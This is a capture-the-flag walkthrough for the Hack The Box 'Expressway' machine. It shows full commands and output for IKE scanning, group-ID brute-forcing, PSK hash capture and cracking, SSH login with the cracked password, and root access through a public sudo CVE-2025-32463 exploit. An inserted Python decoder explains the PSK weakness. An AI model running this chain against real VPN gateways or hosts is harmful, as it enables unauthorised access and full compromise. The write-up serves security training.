Hack The Box / LINUX / 2026-03-07
Hack The Box — Expressway (Linux)
IKE/IPsec enumeration on UDP 500 reveals a valid aggressive-mode group ID and a crackable PSK hash; cracking it gives SSH access as ike, and sudo CVE-2025-32463 leads to root.
Target
Target IP: 10.129.166.223
Port scan
sudo nmap -sC -sV 10.129.166.223 -p- -v -T5
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sU 10.129.166.223 -p- -v --min-rate 10000
PORT STATE SERVICE
500/udp open isakmp
sudo nmap -sC -sV -sU 10.129.166.223 -p500 -v
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Useful site: https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html?highlight=port%20500
IKE enumeration
ike-scan 10.129.166.223
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.166.223 Main Mode Handshake returned HDR=(CKY-R=104824470b6ae834) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.039 seconds (25.35 hosts/sec). 1 returned handshake; 0 returned notify
ike-scan -M --showbackoff 10.129.166.223
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.166.223 Main Mode Handshake returned
HDR=(CKY-R=82d45f7483b9be1a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
10.129.166.223 1 1758149238.004359 0.000000
10.129.166.223 Implementation guess: Linksys Etherfast
Ending ike-scan 1.9.6: 1 hosts scanned in 61.376 seconds (0.02 hosts/sec). 1 returned handshake; 0 returned notify
wget https://book.hacktricks.wiki/en/files/vpnIDs.txt
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line 10.129.166.223) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < ./vpnIDs.txt
Found ID: GroupVPN
Found ID: Group-VPN
Found ID: EZ
Found ID: ez
Found ID: 3000
ike-scan -M -A -n GroupVPN --pskcrack=hash.txt 10.129.166.223
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.166.223 Aggressive Mode Handshake returned
HDR=(CKY-R=3e20508de12f19fd)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.121 seconds (8.26 hosts/sec). 1 returned handshake; 0 returned notify
The ID payload in the aggressive mode response is ike@expressway.htb, so ike is likely a local username.
cat hash.txt
eb83c09f8f1c853fa288fbc186b5a319c3c24447cbfe5b8de93c519ee3a54084e1149368ff25fba7623e5a60ff1caa8f4d8a44650ae087d2f577a662d7997a6aa72d3aa179800ef2bbcc4b9f07e704c3c679c3df2e42c2203eb467c4bdf8f12dbbd42e7253008e205a1a4cd8d3c72c5d3ae96278257abbf903b079945a8f0e13:5771aad2be94025a3b0fb166e9dbdd246f45112a7cdf1539bda6d5bfd97a5e1ef3cfa2dd81a729ade087b403e8a753eec8de7a3bd7156fa4d9a0b8a5a8593d2d1aaf6a30784c5fbb97790070a56a6c7b5958d5c6f693dee728ac73c860a8fa31cb0dee53453685ee5cf29801169b919126f85201879cb2d6c6266399ae524d47:3e20508de12f19fd:066399c30c98556d:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:32d235e8911f2a3322daffb00a0dbef14fb45a4c:3150c16383fca7c5f8ac9c19e481e1f5f0dee355d84ec162827796e415e72356:bb9f205ae2e1a472d752102038c8702345ca5e69
ikescan2john hash.txt
$ike$*0*eb83c09f8f1c853fa288fbc186b5a319c3c24447cbfe5b8de93c519ee3a54084e1149368ff25fba7623e5a60ff1caa8f4d8a44650ae087d2f577a662d7997a6aa72d3aa179800ef2bbcc4b9f07e704c3c679c3df2e42c2203eb467c4bdf8f12dbbd42e7253008e205a1a4cd8d3c72c5d3ae96278257abbf903b079945a8f0e13*5771aad2be94025a3b0fb166e9dbdd246f45112a7cdf1539bda6d5bfd97a5e1ef3cfa2dd81a729ade087b403e8a753eec8de7a3bd7156fa4d9a0b8a5a8593d2d1aaf6a30784c5fbb97790070a56a6c7b5958d5c6f693dee728ac73c860a8fa31cb0dee53453685ee5cf29801169b919126f85201879cb2d6c6266399ae524d47*3e20508de12f19fd*066399c30c98556d*00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080*03000000696b6540657870726573737761792e687462*32d235e8911f2a3322daffb00a0dbef14fb45a4c*3150c16383fca7c5f8ac9c19e481e1f5f0dee355d84ec162827796e415e72356*bb9f205ae2e1a472d752102038c8702345ca5e69
Save the converted line to a file named hash.
./john/run/john --wordlist=./rockyou.txt ./hash
Recovered password:
freakingrockstarontheroad
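As an added example (not part of the original walkthrough), a small decoder for the ike-scan --pskcrack line shown above: it splits the nine fields, decodes the responder's Identification payload (which is where ike@expressway.htb comes from) and walks the offered SA transforms, showing that the responder accepted a 3DES/SHA1/modp1024 PSK proposal and returned HASH_R before any authentication took place, which is exactly why an offline dictionary attack on the PSK is possible. The field order and payload layouts follow ike-scan's psk-crack output and the ISAKMP payload formats in RFC 2408; the sample input is the lab's own hash.txt line.

```python
# Decoder for the nine colon-separated hex fields that ike-scan writes with --pskcrack
# (IKEv1 aggressive mode, PSK auth): g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
import struct

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
ID_TYPES = {1: "ID_IPV4_ADDR", 2: "ID_FQDN", 3: "ID_USER_FQDN", 11: "ID_KEY_ID"}
ENC, HASH, AUTH = {1: "DES-CBC", 5: "3DES-CBC", 7: "AES-CBC"}, {1: "MD5", 2: "SHA1"}, {1: "PSK", 3: "RSA_SIG"}
ATTR = {1: "enc", 2: "hash", 3: "auth", 4: "group", 11: "life_type", 12: "life_duration"}

SAMPLE = ":".join([  # constructed sample: the lab's own hash.txt line from above, split at its colons
    "eb83c09f8f1c853fa288fbc186b5a319c3c24447cbfe5b8de93c519ee3a54084e1149368ff25fba7623e5a60ff1caa8f4d8a44650ae087d2f577a662d7997a6aa72d3aa179800ef2bbcc4b9f07e704c3c679c3df2e42c2203eb467c4bdf8f12dbbd42e7253008e205a1a4cd8d3c72c5d3ae96278257abbf903b079945a8f0e13",  # g_xr: responder DH public value
    "5771aad2be94025a3b0fb166e9dbdd246f45112a7cdf1539bda6d5bfd97a5e1ef3cfa2dd81a729ade087b403e8a753eec8de7a3bd7156fa4d9a0b8a5a8593d2d1aaf6a30784c5fbb97790070a56a6c7b5958d5c6f693dee728ac73c860a8fa31cb0dee53453685ee5cf29801169b919126f85201879cb2d6c6266399ae524d47",  # g_xi: initiator DH public value
    "3e20508de12f19fd", "066399c30c98556d",  # cky_r, cky_i: responder and initiator cookies
    "00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080",  # sai_b: SA payload body the initiator offered
    "03000000696b6540657870726573737761792e687462",  # idir_b: Identification payload body returned by the responder
    "32d235e8911f2a3322daffb00a0dbef14fb45a4c",  # ni_b: initiator nonce
    "3150c16383fca7c5f8ac9c19e481e1f5f0dee355d84ec162827796e415e72356",  # nr_b: responder nonce
    "bb9f205ae2e1a472d752102038c8702345ca5e69",  # hash_r: HASH_R, sent in the clear before any authentication
])

def decode_attrs(data):
    # IKEv1 data attributes: TV (top bit set, 2-byte value) or TLV (2-byte length, then the value)
    attrs, pos = {}, 0
    while pos + 4 <= len(data):
        atype, val = struct.unpack("!HH", data[pos:pos + 4])
        pos += 4
        if not atype & 0x8000:  # TLV: val is the length of the value that follows
            val, pos = int.from_bytes(data[pos:pos + val], "big"), pos + val
        attrs[ATTR.get(atype & 0x7FFF, atype & 0x7FFF)] = val
    return attrs

def decode_sa(sai_b):
    # SA body = DOI(4) SIT(4) + proposal header: next(1) rsv(1) len(2) prop#(1) proto(1) spi_len(1) n_trans(1)
    pos, transforms = 16 + sai_b[14], []
    for _ in range(sai_b[15]):  # each transform: 8-byte header, then its data attributes
        tlen = struct.unpack("!H", sai_b[pos + 2:pos + 4])[0]
        a = decode_attrs(sai_b[pos + 8:pos + tlen])
        transforms.append({"enc": ENC.get(a.get("enc")), "hash": HASH.get(a.get("hash")), "auth": AUTH.get(a.get("auth")),
                           "group": a.get("group"), "life_seconds": a.get("life_duration") if a.get("life_type") == 1 else None})
        pos += tlen
    return transforms

def decode_line(line):
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    f = {name: bytes.fromhex(p) for name, p in zip(FIELDS, parts)}
    id_type = f["idir_b"][0]  # Identification payload body: type(1) proto(1) port(2) data(n)
    return {"id_type": ID_TYPES.get(id_type, id_type), "id_value": f["idir_b"][4:].decode("ascii", "replace"),
            "transforms": decode_sa(f["sai_b"]), "nonce_lens": (len(f["ni_b"]), len(f["nr_b"])), "hash_r_len": len(f["hash_r"])}
```

The four transforms are the four proposals ike-scan offers by default (3DES/DES with SHA1/MD5); a responder that answers at all with Auth=PSK in aggressive mode has already handed over everything needed for offline guessing, which is the configuration weakness to look for on VPN gateways.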
Initial access
ssh ike@10.129.166.223
Enter password:
freakingrockstarontheroad
We get a shell.
sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Privilege escalation
sudo 1.9.17 is affected by CVE-2025-32463 (the sudo chroot bug, "chwoot", patched in 1.9.17p1), for which a public exploit exists:
https://github.com/pr0v3rbs/CVE-2025-32463_chwoot
Upload the sudo-chwoot.sh file from that repository to the victim machine.
chmod +x sudo-chwoot.sh
./sudo-chwoot.sh
We get a shell as root.